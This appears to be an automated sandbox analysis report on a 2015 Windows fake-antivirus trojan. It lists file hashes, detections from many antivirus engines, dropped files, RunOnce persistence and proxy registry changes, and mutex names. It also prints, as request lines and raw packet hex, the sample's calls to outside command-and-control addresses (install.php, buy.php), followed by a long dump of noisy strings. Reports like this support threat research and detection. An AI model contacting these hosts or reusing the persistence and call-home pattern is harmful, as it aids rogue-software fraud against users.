Analysis Date2015-08-28 11:16:15
MD5bfbb36406a628cbd3e009248b656a067
SHA18e3a9f248ba1eb03648660982e5700450bae4cef

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 0add59ff0fb9514f0be31325b96ed792 sha1: 281820c3bb6b9fb115a745306221b95bdad1c809 size: 201216
Section.rdata md5: 1a56dbef144625aa741429f21e26a477 sha1: 9b8ebc3f1acb2d2f7e13180b0c3c53de5857be22 size: 2048
Section.data md5: 6d337014ce8038d37b35fe0a2081aaed sha1: cdb79d7e281fcf8547528c0110642ede1244a51c size: 136704
Section.rsrc md5: 77ac4b35b07939afc31ddf11ea62ff65 sha1: edfdaf7e11edbc35e55d80d4a7864ca38662ec28 size: 5120
Timestamp1970-01-14 04:01:40
PEhash7747ded0fa850355a24fbc6b635377de18b56df8
IMPhash8aaaf4897d2db89e81da04378e9e697c
AVRisingTrojan.FakeAV!49B1
AVMcafeeGeneric FakeAlert.amb
AVAvira (antivir)TR/FakeAV.btxt.7
AVTwisterTrojan.AABC1F0A4405D8AC
AVAd-AwareGen:Heur.Cridex.2
AVAlwil (avast)MalOb-FY [Cryp]
AVEset (nod32)Win32/Kryptik.LYW
AVGrisoft (avg)FakeAlert.AAL
AVSymantecTrojan.FakeAV!gen39
AVFortinetW32/FakeAlert.AMB!tr
AVBitDefenderGen:Heur.Cridex.2
AVK7Trojan ( 001e60c61 )
AVMicrosoft Security EssentialsRogue:Win32/Winwebsec
AVMicroWorld (escan)Gen:Heur.Cridex.2
AVMalwareBytesRogue.SystemTool
AVAuthentiumW32/FakeAlert.LY.gen!Eldorado
AVFrisk (f-prot)W32/FakeAlert.LY.gen!Eldorado
AVIkarusTrojan.Win32.Pakes
AVEmsisoftGen:Heur.Cridex.2
AVZillya!Trojan.FakeAV.Win32.54223
AVKasperskyTrojan.Win32.Generic
AVTrend MicroTROJ_FAKEAV.SMID
AVCAT (quickheal)FraudTool.Security
AVVirusBlokAda (vba32)Malware-Cryptor.Limpopo
AVPadvishno_virus
AVBullGuardGen:Heur.Cridex.2
AVArcabit (arcavir)Error Scanning File
AVClamAVWin.Trojan.Fakeav-6684
AVDr. WebTrojan.Fakealert.20511
AVF-SecureGen:Heur.Cridex.2
AVCA (E-Trust Ino)Win32/Diple.A!generic

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\a3BAC.tmp
Creates FileC:\Documents and Settings\All Users\Application Data\jCgJdMcJcCi07003\jCgJdMcJcCi07003.exe
Creates FileC:\8e3a9f248ba1eb03648660982e5700450bae4cef
Deletes FileC:\8e3a9f248ba1eb03648660982e5700450bae4cef
Creates Process"C:\Documents and Settings\Administrator\Local Settings\Temp\aE1CF.tmp"
Creates Process"C:\Documents and Settings\All Users\Application Data\jCgJdMcJcCi07003\jCgJdMcJcCi07003.exe" "C:\malware.exe"
Creates MutexDon't stop me! I need some money!

Process
↳ "C:\Documents and Settings\All Users\Application Data\jCgJdMcJcCi07003\jCgJdMcJcCi07003.exe" "C:\malware.exe"

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
RegistryHKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\jCgJdMcJcCi07003 ➝
C:\Documents and Settings\All Users\Application Data\jCgJdMcJcCi07003\jCgJdMcJcCi07003.exe\\x00
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\All Users\Application Data\jCgJdMcJcCi07003\jCgJdMcJcCi07003
Creates File\Device\Afd\AsyncConnectHlp
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates MutexDon't stop me! I give work and money for you!
Winsock DNS69.50.209.245
Winsock DNS69.50.195.76

Process
↳ "C:\Documents and Settings\Administrator\Local Settings\Temp\aE1CF.tmp"

Network Details:

HTTP GEThttp://194.28.113.214/lurl.php?affid=07003
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB0.0; .NET CLR 1.1.4322)
HTTP POSThttp://69.50.195.76/install.php?affid=07003
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB0.0; .NET CLR 1.1.4322)
HTTP GEThttp://69.50.209.245/buy.php?affid=07003&data=7F136B16D32EBE585C4D3B61159ED3A2303230323032303200A6CB761B2FEBCD010004&h=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://69.50.209.245/buy.php?affid=07003&data=7F136B16D32EBE585C4D3B61159ED3A2303230323032303200A6CB761B2FEBCD010004&h=2
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Flows TCP192.168.1.1:1031 ➝ 194.28.113.214:80
Flows TCP192.168.1.1:1031 ➝ 194.28.113.214:80
Flows TCP192.168.1.1:1032 ➝ 69.50.195.76:80
Flows TCP192.168.1.1:1034 ➝ 69.50.209.245:80
Flows TCP192.168.1.1:1035 ➝ 69.50.209.245:80

Raw Pcap
0x00000000 (00000)   47455420 2f6c7572 6c2e7068 703f6166   GET /lurl.php?af
0x00000010 (00016)   6669643d 30373030 33204854 54502f31   fid=07003 HTTP/1
0x00000020 (00032)   2e310d0a 52656665 7265723a 20687474   .1..Referer: htt
0x00000030 (00048)   703a2f2f 3139342e 32382e31 31332e32   p://194.28.113.2
0x00000040 (00064)   31340d0a 41636365 70743a20 2a2f2f2a   14..Accept: *//*
0x00000050 (00080)   0d0a5573 65722d41 67656e74 3a204d6f   ..User-Agent: Mo
0x00000060 (00096)   7a696c6c 612f342e 30202863 6f6d7061   zilla/4.0 (compa
0x00000070 (00112)   7469626c 653b204d 53494520 372e303b   tible; MSIE 7.0;
0x00000080 (00128)   2057696e 646f7773 204e5420 352e313b    Windows NT 5.1;
0x00000090 (00144)   20475442 302e303b 202e4e45 5420434c    GTB0.0; .NET CL
0x000000a0 (00160)   5220312e 312e3433 3232290d 0a486f73   R 1.1.4322)..Hos
0x000000b0 (00176)   743a2031 39342e32 382e3131 332e3231   t: 194.28.113.21
0x000000c0 (00192)   340d0a43 6f6e6e65 6374696f 6e3a204b   4..Connection: K
0x000000d0 (00208)   6565702d 416c6976 650d0a43 61636865   eep-Alive..Cache
0x000000e0 (00224)   2d436f6e 74726f6c 3a206e6f 2d636163   -Control: no-cac
0x000000f0 (00240)   68650d0a 0d0a                         he....

0x00000000 (00000)   504f5354 202f696e 7374616c 6c2e7068   POST /install.ph
0x00000010 (00016)   703f6166 6669643d 30373030 33204854   p?affid=07003 HT
0x00000020 (00032)   54502f31 2e310d0a 52656665 7265723a   TP/1.1..Referer:
0x00000030 (00048)   20687474 703a2f2f 36392e35 302e3139    http://69.50.19
0x00000040 (00064)   352e3736 0d0a4163 63657074 3a202a2f   5.76..Accept: */
0x00000050 (00080)   2f2a0d0a 436f6e74 656e742d 54797065   /*..Content-Type
0x00000060 (00096)   3a206170 706c6963 6174696f 6e2f782d   : application/x-
0x00000070 (00112)   7777772d 666f726d 2d75726c 656e636f   www-form-urlenco
0x00000080 (00128)   6465640d 0a557365 722d4167 656e743a   ded..User-Agent:
0x00000090 (00144)   204d6f7a 696c6c61 2f342e30 2028636f    Mozilla/4.0 (co
0x000000a0 (00160)   6d706174 69626c65 3b204d53 49452037   mpatible; MSIE 7
0x000000b0 (00176)   2e303b20 57696e64 6f777320 4e542035   .0; Windows NT 5
0x000000c0 (00192)   2e313b20 47544230 2e303b20 2e4e4554   .1; GTB0.0; .NET
0x000000d0 (00208)   20434c52 20312e31 2e343332 32290d0a    CLR 1.1.4322)..
0x000000e0 (00224)   486f7374 3a203639 2e35302e 3139352e   Host: 69.50.195.
0x000000f0 (00240)   37360d0a 436f6e74 656e742d 4c656e67   76..Content-Leng
0x00000100 (00256)   74683a20 37340d0a 436f6e6e 65637469   th: 74..Connecti
0x00000110 (00272)   6f6e3a20 4b656570 2d416c69 76650d0a   on: Keep-Alive..
0x00000120 (00288)   43616368 652d436f 6e74726f 6c3a206e   Cache-Control: n
0x00000130 (00304)   6f2d6361 6368650d 0a0d0a64 6174613d   o-cache....data=
0x00000140 (00320)   37463133 36423136 44333245 42453538   7F136B16D32EBE58
0x00000150 (00336)   35433444 33423631 31353945 44334132   5C4D3B61159ED3A2
0x00000160 (00352)   33303332 33303332 33303332 33303332   3032303230323032
0x00000170 (00368)   30304136 43423736 31423246 45424344   00A6CB761B2FEBCD
0x00000180 (00384)   30313034 31                           01041

0x00000000 (00000)   47455420 2f627579 2e706870 3f616666   GET /buy.php?aff
0x00000010 (00016)   69643d30 37303033 26646174 613d3746   id=07003&data=7F
0x00000020 (00032)   31333642 31364433 32454245 35383543   136B16D32EBE585C
0x00000030 (00048)   34443342 36313135 39454433 41323330   4D3B61159ED3A230
0x00000040 (00064)   33323330 33323330 33323330 33323030   3230323032303200
0x00000050 (00080)   41364342 37363142 32464542 43443031   A6CB761B2FEBCD01
0x00000060 (00096)   30303034 26683d31 20485454 502f312e   0004&h=1 HTTP/1.
0x00000070 (00112)   310d0a41 63636570 743a202a 2f2a0d0a   1..Accept: */*..
0x00000080 (00128)   41636365 70742d4c 616e6775 6167653a   Accept-Language:
0x00000090 (00144)   20656e2d 75730d0a 41636365 70742d45    en-us..Accept-E
0x000000a0 (00160)   6e636f64 696e673a 20677a69 702c2064   ncoding: gzip, d
0x000000b0 (00176)   65666c61 74650d0a 55736572 2d416765   eflate..User-Age
0x000000c0 (00192)   6e743a20 4d6f7a69 6c6c612f 342e3020   nt: Mozilla/4.0 
0x000000d0 (00208)   28636f6d 70617469 626c653b 204d5349   (compatible; MSI
0x000000e0 (00224)   4520362e 303b2057 696e646f 7773204e   E 6.0; Windows N
0x000000f0 (00240)   5420352e 313b2053 56313b20 2e4e4554   T 5.1; SV1; .NET
0x00000100 (00256)   20434c52 20322e30 2e353037 3237290d    CLR 2.0.50727).
0x00000110 (00272)   0a486f73 743a2036 392e3530 2e323039   .Host: 69.50.209
0x00000120 (00288)   2e323435 0d0a436f 6e6e6563 74696f6e   .245..Connection
0x00000130 (00304)   3a204b65 65702d41 6c697665 0d0a0d0a   : Keep-Alive....
0x00000140 (00320)   37463133 36423136 44333245 42453538   7F136B16D32EBE58
0x00000150 (00336)   35433444 33423631 31353945 44334132   5C4D3B61159ED3A2
0x00000160 (00352)   33303332 33303332 33303332 33303332   3032303230323032
0x00000170 (00368)   30304136 43423736 31423246 45424344   00A6CB761B2FEBCD
0x00000180 (00384)   30313034 31                           01041

0x00000000 (00000)   47455420 2f627579 2e706870 3f616666   GET /buy.php?aff
0x00000010 (00016)   69643d30 37303033 26646174 613d3746   id=07003&data=7F
0x00000020 (00032)   31333642 31364433 32454245 35383543   136B16D32EBE585C
0x00000030 (00048)   34443342 36313135 39454433 41323330   4D3B61159ED3A230
0x00000040 (00064)   33323330 33323330 33323330 33323030   3230323032303200
0x00000050 (00080)   41364342 37363142 32464542 43443031   A6CB761B2FEBCD01
0x00000060 (00096)   30303034 26683d32 20485454 502f312e   0004&h=2 HTTP/1.
0x00000070 (00112)   310d0a41 63636570 743a2069 6d616765   1..Accept: image
0x00000080 (00128)   2f676966 2c20696d 6167652f 782d7862   /gif, image/x-xb
0x00000090 (00144)   69746d61 702c2069 6d616765 2f6a7065   itmap, image/jpe
0x000000a0 (00160)   672c2069 6d616765 2f706a70 65672c20   g, image/pjpeg, 
0x000000b0 (00176)   6170706c 69636174 696f6e2f 782d7368   application/x-sh
0x000000c0 (00192)   6f636b77 6176652d 666c6173 682c202a   ockwave-flash, *
0x000000d0 (00208)   2f2a0d0a 41636365 70742d4c 616e6775   /*..Accept-Langu
0x000000e0 (00224)   6167653a 20656e2d 75730d0a 41636365   age: en-us..Acce
0x000000f0 (00240)   70742d45 6e636f64 696e673a 20677a69   pt-Encoding: gzi
0x00000100 (00256)   702c2064 65666c61 74650d0a 55736572   p, deflate..User
0x00000110 (00272)   2d416765 6e743a20 4d6f7a69 6c6c612f   -Agent: Mozilla/
0x00000120 (00288)   342e3020 28636f6d 70617469 626c653b   4.0 (compatible;
0x00000130 (00304)   204d5349 4520362e 303b2057 696e646f    MSIE 6.0; Windo
0x00000140 (00320)   7773204e 5420352e 313b2053 56313b20   ws NT 5.1; SV1; 
0x00000150 (00336)   2e4e4554 20434c52 20322e30 2e353037   .NET CLR 2.0.507
0x00000160 (00352)   3237290d 0a486f73 743a2036 392e3530   27)..Host: 69.50
0x00000170 (00368)   2e323039 2e323435 0d0a436f 6e6e6563   .209.245..Connec
0x00000180 (00384)   74696f6e 3a204b65 65702d41 6c697665   tion: Keep-Alive
0x00000190 (00400)   0d0a0d0a                              ....


Strings
..-M
O
.
.
F
.
....
..
2.
^
q
K
.
.
.
V
]D...
.
.
zF
1001
File
Main
MS Sans Serif
=.+}};
{00B_<b'T
-00N4j
_09-D<9-
0B@EQHw
0cuO"|T
0G_3C]
0Mb6Ej
?0p{j!
=0)T9-
<0"u4q
1fj8NSM
1,}HLpn
;1iqdr
(1M"Ay
1q#(%|
1rdG_/
1t_xx;
1V4\TUr
1V\	'E
_1>vpO
2&4nY!
26e~#Se
2i]EjP
2_MvH%
,*2}o8
2RDV7?5
2?((xR
38KVSJw
3;Bs$K
}"3<cWno
3g@}Q~i
^3:]U@
\3U$wM
4Eiq';
)@4exgqm
4F,0&|	/
=4L`7O
4qE@(F
4~ZP5'Nr
5Cp1DL
5=d7D4
5F3#(|
5]i9Ug
5j&,1j
5O3I:p
5yD7%j
)5++yv
62ZOjBB
6.A0BM%
6a`46a#
"	6_E	P
?6es=+
6!gvjw
	6~Hf6
6I3NN]
6%`LKd
6LYo`F{
6Oxm8`
|6$Pvg
7ddbHh
7/g4\Z
"7'kn/
~7s(6;
}8-2.!K
8?Ae9?AE6?AE7?AE4?A
8iR0N3
8>javLu
+8V,i:
8Xt@	^
8#$.Zf
94Wm{ 
9dqI\P~]
9G%8^6=1
!9:	gG8x
9jdLqdO
9p^SYp.`
A4v/8G:z
a"	8R)F
*@{a9/
aBOm m
?Ae	?AE^
AE<(AE
;aEE5j
AEF*AE
AEI&AEZ
A"F75`u
aI{4KO2
AL;bfXM
	aMC"Q
aqt~5}yg-/_
Ar7&<(R
</assembly>
<assemblyIdentity
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
;A|VF>
aWnZc"y
'Ay5b*
A}zsNe^
::b0TD5
B3irlY&
B@ 4zJ
,	B7OR>
B9NHrF
b=[aGk
BaWAdb
@|(BbX
B@>Dn"0NNm
B(FC!w
:b]F&f
BitBlt
=BL~|24
BNVU?^
bP]~;`
C19<X_
'C1m'2^
c1q^M"
cAl^#+}Y
c_BG'u
ccYWf@
[Cdb~?
;Cd*ea
c FhO(v~
CharLowerA
CloseHandle
}@CL_Q-
c#oqA	w
C=p[P2
cPY(h0
CreateThread
c^zv%w
_?d>6#d>S
	d7'lL
*d>9I'^
Dafn*%
@.data
=<\dBBE
DClm66
DeleteCriticalSection
</dependency>
<dependency>
</dependentAssembly>
<dependentAssembly>
DFv&r5
:(-D{*gq=
,[DiqXPw
d	`'&j
=dJI<d
dJ#uWD
DJ,(V^
dMo7_!
DN&{Vma9
DnYj1Gb
D_oN!3
D;ROE-
dUEK&F
duJ1NV
DwHIii
D_W-P=
dY{OdF%
:?e2q>g
e@9r{ ~
-e(-`E
ef<T;e
`EHxJDha
e}J?:Az_o
</EK 6
E|kv.8
EM.Dyl
EnumSystemLocalesA
enYMea(
e>$OhIO
;e)Pv/
:E~QQf
e,QR.A
er39J}w+
et>9qF
e^T+?y8
EU^(h>:-
?:-eVz
:Ex*/&
ExitProcess
ExitThread
f1DXul%
faiM^BM
fd1&?iI
fFjQO>$
	\F^hu
fhy*fC_
FJHRFx
FlushFileBuffers
FlushInstructionCache
FmE:")
{&;foN
:FQAjGy
FreeEnvironmentStringsA
:FRV<za"4
*.@fTI%
f>+TX4C
fv.]AN
fV']fZw
$*F$,y
Fy|S.D6
'f.z4g%l
/G06C!
#G^4eN
g5krZC
Ga7t8W/
GaH0[5
*Gb!{!
(<gb3DfEE
g[CpD [e
GDI32.dll
,GDJ0E
.G<dvh
'GdZAkd
g>e"f*#
GetBkColor
GetBkMode
GetCommandLineA
GetConsoleCP
GetConsoleMode
GetConsoleOutputCP
GetCurrentProcess
GetCurrentProcessId
GetCurrentThreadId
GetEnvironmentStrings
GetFileType
GetKeyState
GetLastError
GetOEMCP
GetPixel
GetProcessHeap
GetProcessShutdownParameters
GetStartupInfoA
GetStdHandle
GetStringTypeA
GetTimeZoneInformation
GetWindowLongW
gf~W@`
>GgQ]ia
Gh~zW*
G~^ikd
)gjS"h_E
g^l\d>%
glRP&7
|GPGdIiP
gq^	)B
g&R\d U
'Gr#}y{v*
GTWfX|
^G@;x]
`>gxTD
GzYb>%
h.38,I
:h8[cy
h^{9y/
HAq|aH
H[{BCU
HeapAlloc
HeapCreate
HeapFree
[HlXKc
h"Ng^(O*
h.Qdd8
HqYO8pW
hrpge:
ht0r.j
=^h;|+U
/hZCWnz
	i$!3 
i}9{Y^
*i}B5__&
iBAF&2
[IClN[
IF)pv=
I*~I'l
](IJuK
I&*\jUm#
ik49tG
[`ile6
ILpB0&/
In`2R/@O
InterlockedDecrement
InterlockedExchange
iq6bOi
Iq[r S
?I>{rr>H5d
&i.]sm
IsValidLocale
it}BmIIJ
Iv^:7:
i^}yk8d
j3RMvAd
j6m$KMFy
?{jA)AT
j!ay:w
J[D./_k*zi3JL^:
jFH9h]n
jhEht~
j|hF2Y
jHPR&j
J&i$Hw
JkFZW=!
JK )&j
	JLn`s,
j(ON9;
j"P8h#
jPf.*!
Jp%XvM
Jq<p?f
j!;s3p
&J^Tz`f
jvz^KW
Jx	q^g
K5k>\1
K5Y/9a
ka14cR
),K#b_
KbD;]s
k&&dA|
KERNEL32.dll
kff^ce/
kH/	1<
KjKddP
?KjVm)
kKr)DV
>+KL &
&K@S1j
kTW5B:
k":}}x+m
;kx<)r
kZy3]')
language="*"
LCMapStringA
LDLYJ"<
LeaveCriticalSection
L(eb,>l
Le:x>|
_L+"f _
LFhZ@G	
LI\bb#
ln6}SW
LocalAlloc
l.qfe43
lqj2w\
L(RO@7
lRU"3T
M7&\V.
m8:.Nk
(<M#'9
mBAWGB
MBW^}@
McpjRf
,!MD:S
*Me,WrC
mgKW#T
M)L>	Ye
m&Ng*&
MoJ46:ez
mouF*c
,`MRP;
MRrAt:
MSIMG32.dll
M'sM9q/M_
}#*mt7I
()Mv?4`a
MZ4S=1
n.1zn'9
N8a	(;~
name="Microsoft.Windows.Common-Controls"
.Nat.b
nAyi*)zl
nF@Hp/0
NGC/lP
nJK+.4
nN[/dqP
nqu^&Q
nro.I e
[NSPz2
nU]uB_
`^;nw 
nXFb=\
Nx`J\N
NxOv/<
O8D6{zj%
,Oar*q6
O@<!BB
OiK\MQZ
okEo9uH
o=KjJ2
o^@KVJ
oNJf;B
oop04N
osFGj!
O<]T#~
#Ov=5a
oVeJiu
	O}XN.
oZzn`!
p0Dr`2i
p'7hW%
<PBx};Y
PC@5~#
p:e~zpk
^pG=]Z7
&pKxT#
/plX/W
?PQ:SQ
PQvRk=@V[
processorArchitecture="*"/>
PTt.12D
publicKeyToken="6595b64144ccf1df"
pUqfcnH
P*walF
q2S7	`
^Q3FIQA1
Q5.]P7
!q_6Ei
Q7S(o{
q9194=,
q:gY|4!
.<QhIK
Qk*|G$
QM_roevU
*qN	^%
QQA4y#S
*Qq<=;n
Qr!6KW
{q~x)r
Qy"7bw
Q?.>Za
R0__9'=
.Ra5=9
`.rdata
@R]EC:
RF-&6#3;G
r,F-9x
}+~rH?
	r;hscX
Rhyv.A
Rich$-
RiMCft
rjVnyY^B|
RK>cqw=
/rnk|	
?RO=9</
R?Q],O}
rSjz/,
RtlUnwind
;R`toG
"r<W,_
RyH(w	
rZ3u::AlA
Rz67>1
&<};'s
s0~=H>
,SC+p.
s)dr,n
SelectObject
SetAbortProc
SetEndOfFile
SetEnvironmentVariableA
SetHandleCount
SetLastError
SetProcessShutdownParameters
SetStdHandle
SetTextCharacterExtra
siu#[B
s=NBvG-&
?S?Rsw
{{SS>0
StA]=~
sVKS9JU^
~:@t|{
T4D(2	Y
t$(B_d
Tb*|#j#
T>DNn2YF
Te~jKdcn*o5
!This program cannot be run in DOS mode.
thMi~N6&
tjfEQJV
tLqWB%
tn46gBu
tNA0K*+
TransparentBlt
:TR{oA,8
=tv1#"
tY1@2>
type="win32"
u>0SQa
u>0sX>$
U	1_}T
u.2Ci2|
u68Q#G8F
u6;`Vf
u.7B=D
u7N7EL
*|?$"ua@
u>$aM7
U*BN^f)+
uC2h	#
UCA	m~
uD*8Z@5
uD=O_"
u>e_:`\
U<ERrgU
u~F{~G
uf^QY`
ui9Thr
,UIO+&
UJc"dn
uJ)q~)
uKg?f2z
u@)N?{
un4eK!/
U:N74$
un*M*_
U]QgI.
USER32.dll
u~}sZ	
u>t(e.G-V
u.<UL8
u.u!}YM
u^<ViJ*
-UxS_A
v3#4@F
?v4f=pu)
V5iOjx
`V6*j^
v?Bq35
V_Cn6`
~|VdFD
version="6.0.0.0"
VF6q.5
V\;I;:
VirtualAlloc
VirtualFree
VirtualQueryEx
Vm\42G
vn{OQ/
vvIfBI
v-yRU&
v#]')z
:VzDzeD
w^3%joN
}W5oG9
wcTvOE
:	wd.9
Wg\V"U
]wi7+|
WNCuZ;
)W:"p]`
wQ?DrH
WriteConsoleA
w<T+OPw
wv1ET8R
!@wWpvVrj
x4TSe)4
xA<^:2
#XA6>'+
XcD[UM
XCVLn:
x EM]x
&X,f>y
xGLg+~
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
[>XNLf
?x.ojSg}
xS5);m
xSR)CI
XWfV"ye
XZGUY*F
y2;X>#
Y6C"m@z
yAs-}duq
Yft	4-
yQiy3X 
YuV*a5
"y]v6=
Y@V*S5
Z0j.)_+h}<
z1]WZHuQ
z2sm.s
|Z6Diz
`.z9a&
ZD!!%&=
Ze4+2y`
zE5Dpp
zFjzA'
Z!fp?]
Z=]>GU
ZKu~?]
ZQlq0u
`.ZwIh
zY5lQ5